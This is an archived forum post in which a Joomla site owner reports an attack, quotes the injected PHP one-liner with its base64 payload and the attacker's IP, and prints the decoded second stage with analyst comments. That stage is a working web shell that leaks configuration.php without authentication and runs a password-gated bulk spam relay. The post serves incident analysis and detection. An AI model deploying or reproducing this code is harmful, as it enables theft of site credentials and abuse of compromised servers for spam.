
View Full Version : Hackers must be watching this forum


peterwalker
05-02-2017, 06:25 AM
Since I posted here in March, there have been numerous attacks on the website my-caribbeanradio.com. The latest, today at 2:26pm EST from a China IP, 119.254.63.253, went after the Joomla configuration.php by passing the following cryptic code via URL:

[email protected]_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0); echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/error_log.php',base64_decode('PD9waHANCmlmICgkX1JF UVVFU1RbJ211aWUnXT09ImFsbCIpIHsNCiRzID0kX1NFUlZFUl snU0VSVkVSX05BTUUnXTskYz1iYXNlNjRfZW5jb2RlKGZpbGVf Z2V0X2NvbnRlbnRzKCdjb25maWd1cmF0aW9uLnBocCcpKTtlY2 hvICRzIC4gIiAiIC4gJGM7DQp9DQpzZXRfdGltZV9saW1pdCgw KTsNCmlnbm9yZV91c2VyX2Fib3J0KHRydWUpOw0KDQogICAgIC AgICRhYyA9ICRfUE9TVFsnYWMnXTsgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgIC AgICAkVmVyaWZ5PSRfUE9TVFsnVmVyaWZ5J107DQogICAgICAg ICRGcm9tPSRfUE9TVFsnRnJvbSddOw0KICAgICAgICAkUmVhbE 5hbWU9JF9QT1NUWydSZWFsTmFtZSddOw0KICAgICAgICAkU3Vi amVjdD0kX1BPU1RbJ1N1YmplY3QnXTsNCiAgICAgICAgJE1haW xCb2R5PSRfUE9TVFsnTWFpbEJvZHknXTsNCiAgICAgICAgJE1h aWxMaXN0PSRfUE9TVFsnTWFpbExpc3QnXTsNCiAgICAgICAgJE Zvcm1hdD0kX1BPU1RbJ0Zvcm1hdCddOw0KICAgICAgICAkRW5j b2Rpbmc9JF9QT1NUWydFbmNvZGluZyddOw0KICAgICAgICAkRG VsYXk9JF9QT1NUWydEZWxheSddOw0KDQogICAgICAgICRTYW5k eUtleT0kX1BPU1RbJ1NhbmR5S2V5J107DQogICAgICAgICRTYW 5keU5SQT0kX1BPU1RbJ1NhbmR5TlJBJ107DQogICAgICAgICRT YW5keU5SQj0kX1BPU1RbJ1NhbmR5TlJCJ107DQogICAgICAgIC RTYW5keVJOQT0kX1BPU1RbJ1NhbmR5Uk5BJ107DQogICAgICAg ICRTYW5keVJOQj0kX1BPU1RbJ1NhbmR5Uk5CJ107DQogICAgIC AgICRDb2RlU2l6ZT0kX1BPU1RbJ0NvZGVTaXplJ107DQoNCiAg ICAgICAgJFNBTkRZX1NFUlZFUj0kX1NFUlZFUlsnU0VSVkVSX0 5BTUUnXTsNCg0KLyogQWNjZXNzIFByb3RlY3Rpb24gKi8NCiAg JHByb3RlY3Rpb249IjFhZjk4NjA5YWRmNzk2YjIxYzlmYzczNW UzMWM1N2I3IjsNCiAgaWYobWQ1KCRWZXJpZnkpIT09JHByb3Rl Y3Rpb24peyBleGl0OyB9DQoNCg0KIGlmICgkYWM9PSJnbyIpew 0KICAkTWFpbEJvZHkgPSB1cmxlbmNvZGUoJE1haWxCb2R5KTsN CiAgJE1haWxCb2R5ID0gZXJlZ19yZXBsYWNlKCIlNUMlMjIiLC AiJTIyIiwgJE1haWxCb2R5KTsNCiAgJE1haWxCb2R5ID0gdXJs ZGVjb2RlKCRNYWlsQm9keSk7DQogICRNYWlsQm9keSA9IHN0cm 
lwc2xhc2hlcygkTWFpbEJvZHkpOw0KICAkU3ViamVjdCA9IHN0 cmlwc2xhc2hlcygkU3ViamVjdCk7IH0NCg0KIGlmICgkYWM9PS JnbyIpew0KIGlmICghJEZyb20gJiYgISRTdWJqZWN0ICYmICEk TWFpbEJvZHkgJiYgISRNYWlsTGlzdCl7DQogcHJpbnQgIkZpZW xkcyBtaXNzaW5nLiI7DQogZXhpdDsNCiB9DQogICRhbGxlbWFp bHMgPSBzcGxpdCgiXG4iLCAkTWFpbExpc3QpOw0KICAkbm0gPS Bjb3VudCgkYWxsZW1haWxzKTsNCiBmb3IoJHg9MDsgJHg8JG5t OyAkeCsrKXsNCiAgJHRvID0gJGFsbGVtYWlsc1skeF07DQogIC REZXN0ID0gZXhwbG9kZSgiLyIsICR0byk7DQogICREZXN0aW5h dGlvbiA9ICREZXN0WzBdOw0KDQogaWYgKCREZXN0aW5hdGlvbi l7ICAgICAgICAgICAgICAgIA0KICAkRGVzdGluYXRpb24gPSBl cmVnX3JlcGxhY2UoIiAiLCAiIiwgJERlc3RpbmF0aW9uKTsNCi AgJE1haWxCb2R5ID0gZXJlZ19yZXBsYWNlKCImZW1haWwmIiwg JERlc3RpbmF0aW9uLCAkTWFpbEJvZHkpOw0KICAkU3ViamVjdC A9IGVyZWdfcmVwbGFjZSgiJmVtYWlsJiIsICREZXN0aW5hdGlv biwgJFN1YmplY3QpOw0KICAkbnJtYWlsPSR4KzE7DQogICRkb2 1haW4gPSBzdWJzdHIoJEZyb20sIHN0cnBvcygkRnJvbSwgIkAi KSwgc3RybGVuKCRGcm9tKSk7DQoNCiAgLyogVGVtcGxhdGUgWm 9uZSAqLw0KICAkU0FORFlfTlIgPSByYW5kKCRTYW5keU5SQSwk U2FuZHlOUkIpOw0KICAkU0FORFlfUk4gPSByYW5kKCRTYW5keV JOQSwkU2FuZHlSTkIpOw0KICAkU0FORFlfSEFTSCA9IG1kNSgi JERlc3RpbmF0aW9uKyRTYW5keUtleSIpOw0KICAkU0FORFlfQ0 9ERV9MT1dFUiA9IHN1YnN0cigiJFNBTkRZX0hBU0giLCAkQ29k ZVNpemUpOw0KICAkU0FORFlfQ09ERV9VUFBFUiA9IHN0cnRvdX BwZXIoJFNBTkRZX0NPREVfTE9XRVIpOw0KICAkU0FORFlfTkFN RSA9ICREZXN0WzFdOw0KICAkU0FORFlfVU1BSUwgPSBiYXNlNj RfZW5jb2RlKCREZXN0aW5hdGlvbik7DQoNCiAgJEZyb20xID0g c3RyX3JlcGxhY2UoIlNBTkRZX05SIiwgJFNBTkRZX05SLCAkRn JvbSk7DQogICRGcm9tMiA9IHN0cl9yZXBsYWNlKCJTQU5EWV9S TiIsICRTQU5EWV9STiwgJEZyb20xKTsNCiAgJEZyb20zID0gc3 RyX3JlcGxhY2UoIlNBTkRZX0hBU0giLCAkU0FORFlfSEFTSCwg JEZyb20yKTsNCiAgJEZyb200ID0gc3RyX3JlcGxhY2UoIlNBTk RZX0NPREVfTE9XRVIiLCAkU0FORFlfQ09ERV9MT1dFUiwgJEZy b20zKTsNCiAgJEZyb201ID0gc3RyX3JlcGxhY2UoIlNBTkRZX0 NPREVfVVBQRVIiLCAkU0FORFlfQ09ERV9VUFBFUiwgJEZyb200 KTsNCiAgDQoNCiAgJFJlYWxOYW1lMSA9IHN0cl9yZXBsYWNlKC JTQU5EWV9OUiIsICRTQU5EWV9OUiwgJFJlYWxOYW1lKTsNCiAg JFJlYWxOYW1lMiA9IHN0cl9yZXBsYWNlKCJTQU5EWV9STiIsIC RTQU5EWV9STiwgJFJlYWxOYW1lMSk7DQogICRSZWFsTmFtZTMg 
PSBzdHJfcmVwbGFjZSgiU0FORFlfSEFTSCIsICRTQU5EWV9IQV NILCAkUmVhbE5hbWUyKTsNCiAgJFJlYWxOYW1lNCA9IHN0cl9y ZXBsYWNlKCJTQU5EWV9DT0RFX0xPV0VSIiwgJFNBTkRZX0NPRE VfTE9XRVIsICRSZWFsTmFtZTMpOw0KICAkUmVhbE5hbWU1ID0g c3RyX3JlcGxhY2UoIlNBTkRZX0NPREVfVVBQRVIiLCAkU0FORF lfQ09ERV9VUFBFUiwgJFJlYWxOYW1lNCk7DQoNCiAgJE1haWxC b2R5MSA9IHN0cl9yZXBsYWNlKCJTQU5EWV9OUiIsICRTQU5EWV 9OUiwgJE1haWxCb2R5KTsNCiAgJE1haWxCb2R5MiA9IHN0cl9y ZXBsYWNlKCJTQU5EWV9STiIsICRTQU5EWV9STiwgJE1haWxCb2 R5MSk7DQogICRNYWlsQm9keTMgPSBzdHJfcmVwbGFjZSgiU0FO RFlfSEFTSCIsICRTQU5EWV9IQVNILCAkTWFpbEJvZHkyKTsNCi AgJE1haWxCb2R5NCA9IHN0cl9yZXBsYWNlKCJTQU5EWV9OQU1F IiwgJFNBTkRZX05BTUUsICRNYWlsQm9keTMpOw0KICAkTWFpbE JvZHk1ID0gc3RyX3JlcGxhY2UoIlNBTkRZX0RFU1RJTkFUSU9O IiwgJERlc3RpbmF0aW9uLCAkTWFpbEJvZHk0KTsNCiAgJE1haW xCb2R5NiA9IHN0cl9yZXBsYWNlKCJTQU5EWV9DT0RFX0xPV0VS IiwgJFNBTkRZX0NPREVfTE9XRVIsICRNYWlsQm9keTUpOw0KIC AkTWFpbEJvZHk3ID0gc3RyX3JlcGxhY2UoIlNBTkRZX0NPREVf VVBQRVIiLCAkU0FORFlfQ09ERV9VUFBFUiwgJE1haWxCb2R5Ni k7DQogICRNYWlsQm9keTggPSBzdHJfcmVwbGFjZSgiU0FORFlf VU1BSUwiLCAkU0FORFlfVU1BSUwsICRNYWlsQm9keTcpOyANCg 0KDQogICRTdWJqZWN0MSA9IHN0cl9yZXBsYWNlKCJTQU5EWV9O UiIsICRTQU5EWV9OUiwgJFN1YmplY3QpOw0KICAkU3ViamVjdD IgPSBzdHJfcmVwbGFjZSgiU0FORFlfUk4iLCAkU0FORFlfUk4s ICRTdWJqZWN0MSk7DQogICRTdWJqZWN0MyA9IHN0cl9yZXBsYW NlKCJTQU5EWV9IQVNIIiwgJFNBTkRZX0hBU0gsICRTdWJqZWN0 Mik7DQogICRTdWJqZWN0NCA9IHN0cl9yZXBsYWNlKCJTQU5EWV 9OQU1FIiwgJFNBTkRZX05BTUUsICRTdWJqZWN0Myk7DQogICRT dWJqZWN0NSA9IHN0cl9yZXBsYWNlKCJTQU5EWV9ERVNUSU5BVE lPTiIsICREZXN0aW5hdGlvbiwgJFN1YmplY3Q0KTsNCiAgJFN1 YmplY3Q2ID0gc3RyX3JlcGxhY2UoIlNBTkRZX0NPREVfTE9XRV IiLCAkU0FORFlfQ09ERV9MT1dFUiwgJFN1YmplY3Q1KTsNCiAg JFN1YmplY3Q3ID0gc3RyX3JlcGxhY2UoIlNBTkRZX0NPREVfVV BQRVIiLCAkU0FORFlfQ09ERV9VUFBFUiwgJFN1YmplY3Q2KTsN CiAgJFN1YmplY3Q4ID0gc3RyX3JlcGxhY2UoIlNBTkRZX1NFUl ZFUiIsICRTQU5EWV9TRVJWRVIsICRTdWJqZWN0Nyk7DQoNCi8q IFNlbmRpbmcgTWFpbCAqLw0KIHByaW50ICIkbnJtYWlsOiRubT okRGVzdGluYXRpb24iOw0KIGlmKCREZWxheSAhPSAwKSB7IHNs ZWVwKCREZWxheSk7IH0NCiBmbHVzaCgpOw0KICAkaGVhZGVyID 
0gIkZyb206ICRSZWFsTmFtZTUgPCRGcm9tNT5cclxuIjsNCiAg JGhlYWRlciAuPSAiTUlNRS1WZXJzaW9uOiAxLjBcclxuIjsNCi AgJGhlYWRlciAuPSAiQ29udGVudC1UeXBlOiAkRm9ybWF0XHJc biI7DQogICRoZWFkZXIgLj0gIkNvbnRlbnQtVHJhbnNmZXItRW 5jb2Rpbmc6ICRFbmNvZGluZ1xyXG5cclxuIjsNCiAgJGhlYWRl ciAuPSAiJE1haWxCb2R5OFxyXG4iOw0KIG1haWwoJERlc3Rpbm F0aW9uLCAkU3ViamVjdDgsICIiLCAkaGVhZGVyKTsNCiBwcmlu dCAiXG4iOw0KIGZsdXNoKCk7DQogICAgfQ0KICB9DQp9DQo/Pg0KDQo='));echo '|<-';

The decoded version of the above
m^r^<?php
/*
 * Analyst notes on the decoded second stage (sample left byte-for-byte as posted).
 *
 * The injected one-liner in the post writes this script to
 * DOCUMENT_ROOT/error_log.php, so a PHP file with that name in the web root
 * is the on-disk indicator. The script does two things:
 *   1. discloses configuration.php to any requester (no authentication), and
 *   2. acts as a password-gated bulk mail relay driven entirely by POST fields.
 *
 * NOTE(review): the "m^r^" in front of the opening tag is not part of the
 * base64 payload, which begins with the bytes for "<?php"; presumably an
 * artifact of the tool used to decode it.
 */

/*
 * Unauthenticated disclosure: when the request parameter muie equals "all",
 * the script prints the server name followed by the base64 of the file
 * configuration.php (relative path). This runs BEFORE the access check
 * further down, so it needs no password. The post identifies the target as
 * the Joomla configuration.php; every secret stored in that file should be
 * treated as exposed and rotated.
 * NOTE(review): the space in 'configuration .php' looks like a forum
 * line-wrapping artifact; the post text names the file as configuration.php.
 */
if ($_REQUEST['muie']=="all") {
$s =$_SERVER['SERVER_NAME'];$c=base64_encode(file_get_contents('configuration .php'));echo $s . " " . $c;
}
/* No execution time limit, and keep running after the client disconnects. */
set_time_limit(0);
ignore_user_abort(true);

/* Every mail parameter is taken directly from the POST body, unvalidated. */
$ac = $_POST['ac'];
$Verify=$_POST['Verify'];
$From=$_POST['From'];
$RealName=$_POST['RealName'];
$Subject=$_POST['Subject'];
$MailBody=$_POST['MailBody'];
$MailList=$_POST['MailList'];
$Format=$_POST['Format'];
$Encoding=$_POST['Encoding'];
$Delay=$_POST['Delay'];

/* Operator-supplied inputs for the per-recipient tokens built below. */
$SandyKey=$_POST['SandyKey'];
$SandyNRA=$_POST['SandyNRA'];
$SandyNRB=$_POST['SandyNRB'];
$SandyRNA=$_POST['SandyRNA'];
$SandyRNB=$_POST['SandyRNB'];
$CodeSize=$_POST['CodeSize'];

$SANDY_SERVER=$_SERVER['SERVER_NAME'];

/* Access Protection */
/*
 * Gate for the mailer only: the MD5 of POST field Verify must equal the
 * hard-coded digest, otherwise the script exits silently. The digest string
 * is a fixed value in the file and therefore usable as a file-scanning
 * indicator for this sample.
 */
$protection="1af98609adf796b21c9fc735e31c57b7";
if(md5($Verify)!==$protection){ exit; }


/*
 * ac == "go" starts a mail run. First the body and subject are un-escaped:
 * encoded backslash-quote (%5C%22) becomes a plain quote and slashes are
 * stripped. ereg_replace() here and split() below were removed in PHP 7.0,
 * so on PHP 7+ the mail run stops with a fatal error at this call; the
 * configuration.php disclosure at the top of the file is unaffected because
 * it executes earlier.
 */
if ($ac=="go"){
$MailBody = urlencode($MailBody);
$MailBody = ereg_replace("%5C%22", "%22", $MailBody);
$MailBody = urldecode($MailBody);
$MailBody = stripslashes($MailBody);
$Subject = stripslashes($Subject); }

if ($ac=="go"){
/* Aborts only when From, Subject, MailBody and MailList are ALL empty. */
if (!$From && !$Subject && !$MailBody && !$MailList){
print "Fields missing.";
exit;
}
/* One recipient per line of MailList; each entry has the form address/name. */
$allemails = split("\n", $MailList);
$nm = count($allemails);
for($x=0; $x<$nm; $x++){
$to = $allemails[$x];
$Dest = explode("/", $to);
$Destination = $Dest[0];

if ($Destination){
/* Strip spaces from the address and fill the &email& placeholder. */
$Destination = ereg_replace(" ", "", $Destination);
$MailBody = ereg_replace("&email&", $Destination, $MailBody);
$Subject = ereg_replace("&email&", $Destination, $Subject);
$nrmail=$x+1;
/* $domain is computed but not used anywhere else in this listing. */
$domain = substr($From, strpos($From, "@"), strlen($From));

/* Template Zone */
/*
 * Per-recipient values: two random integers within POST-supplied bounds, an
 * MD5 over the address joined to SandyKey with a literal "+", a substring of
 * that hash starting at offset CodeSize (lower and upper case), the name part
 * of the list entry, and the base64 of the address.
 * NOTE(review): presumably these make every message differ so identical-copy
 * spam filtering is less effective -- inferred, not stated in the sample.
 */
$SANDY_NR = rand($SandyNRA,$SandyNRB);
$SANDY_RN = rand($SandyRNA,$SandyRNB);
$SANDY_HASH = md5("$Destination+$SandyKey");
$SANDY_CODE_LOWER = substr("$SANDY_HASH", $CodeSize);
$SANDY_CODE_UPPER = strtoupper($SANDY_CODE_LOWER);
$SANDY_NAME = $Dest[1];
$SANDY_UMAIL = base64_encode($Destination);

/* Substitute the SANDY_* placeholders into the sender address ... */
$From1 = str_replace("SANDY_NR", $SANDY_NR, $From);
$From2 = str_replace("SANDY_RN", $SANDY_RN, $From1);
$From3 = str_replace("SANDY_HASH", $SANDY_HASH, $From2);
$From4 = str_replace("SANDY_CODE_LOWER", $SANDY_CODE_LOWER, $From3);
$From5 = str_replace("SANDY_CODE_UPPER", $SANDY_CODE_UPPER, $From4);


/* ... the sender display name ... */
$RealName1 = str_replace("SANDY_NR", $SANDY_NR, $RealName);
$RealName2 = str_replace("SANDY_RN", $SANDY_RN, $RealName1);
$RealName3 = str_replace("SANDY_HASH", $SANDY_HASH, $RealName2);
$RealName4 = str_replace("SANDY_CODE_LOWER", $SANDY_CODE_LOWER, $RealName3);
$RealName5 = str_replace("SANDY_CODE_UPPER", $SANDY_CODE_UPPER, $RealName4);

/* ... the message body (also SANDY_NAME, SANDY_DESTINATION, SANDY_UMAIL) ... */
$MailBody1 = str_replace("SANDY_NR", $SANDY_NR, $MailBody);
$MailBody2 = str_replace("SANDY_RN", $SANDY_RN, $MailBody1);
$MailBody3 = str_replace("SANDY_HASH", $SANDY_HASH, $MailBody2);
$MailBody4 = str_replace("SANDY_NAME", $SANDY_NAME, $MailBody3);
$MailBody5 = str_replace("SANDY_DESTINATION", $Destination, $MailBody4);
$MailBody6 = str_replace("SANDY_CODE_LOWER", $SANDY_CODE_LOWER, $MailBody5);
$MailBody7 = str_replace("SANDY_CODE_UPPER", $SANDY_CODE_UPPER, $MailBody6);
$MailBody8 = str_replace("SANDY_UMAIL", $SANDY_UMAIL, $MailBody7);


/* ... and the subject (also SANDY_SERVER, the compromised host's own name). */
$Subject1 = str_replace("SANDY_NR", $SANDY_NR, $Subject);
$Subject2 = str_replace("SANDY_RN", $SANDY_RN, $Subject1);
$Subject3 = str_replace("SANDY_HASH", $SANDY_HASH, $Subject2);
$Subject4 = str_replace("SANDY_NAME", $SANDY_NAME, $Subject3);
$Subject5 = str_replace("SANDY_DESTINATION", $Destination, $Subject4);
$Subject6 = str_replace("SANDY_CODE_LOWER", $SANDY_CODE_LOWER, $Subject5);
$Subject7 = str_replace("SANDY_CODE_UPPER", $SANDY_CODE_UPPER, $Subject6);
$Subject8 = str_replace("SANDY_SERVER", $SANDY_SERVER, $Subject7);

/* Sending Mail */
/*
 * Progress is written to the HTTP response as "index:total:address" per
 * recipient, with an optional sleep of Delay seconds between messages.
 * The message is sent through the host's own mail() with an empty message
 * argument: the body is appended to the header string after a blank line.
 * From, Content-Type and Content-Transfer-Encoding are all request-supplied.
 * For responders: outbound mail originating from the web server's PHP
 * process and POST requests to this file in the access log are the places
 * to look for evidence that the relay was actually used.
 */
print "$nrmail:$nm:$Destination";
if($Delay != 0) { sleep($Delay); }
flush();
$header = "From: $RealName5 <$From5>\r\n";
$header .= "MIME-Version: 1.0\r\n";
$header .= "Content-Type: $Format\r\n";
$header .= "Content-Transfer-Encoding: $Encoding\r\n\r\n";
$header .= "$MailBody8\r\n";
mail($Destination, $Subject8, "", $header);
print "\n";
flush();
}
}
}
?>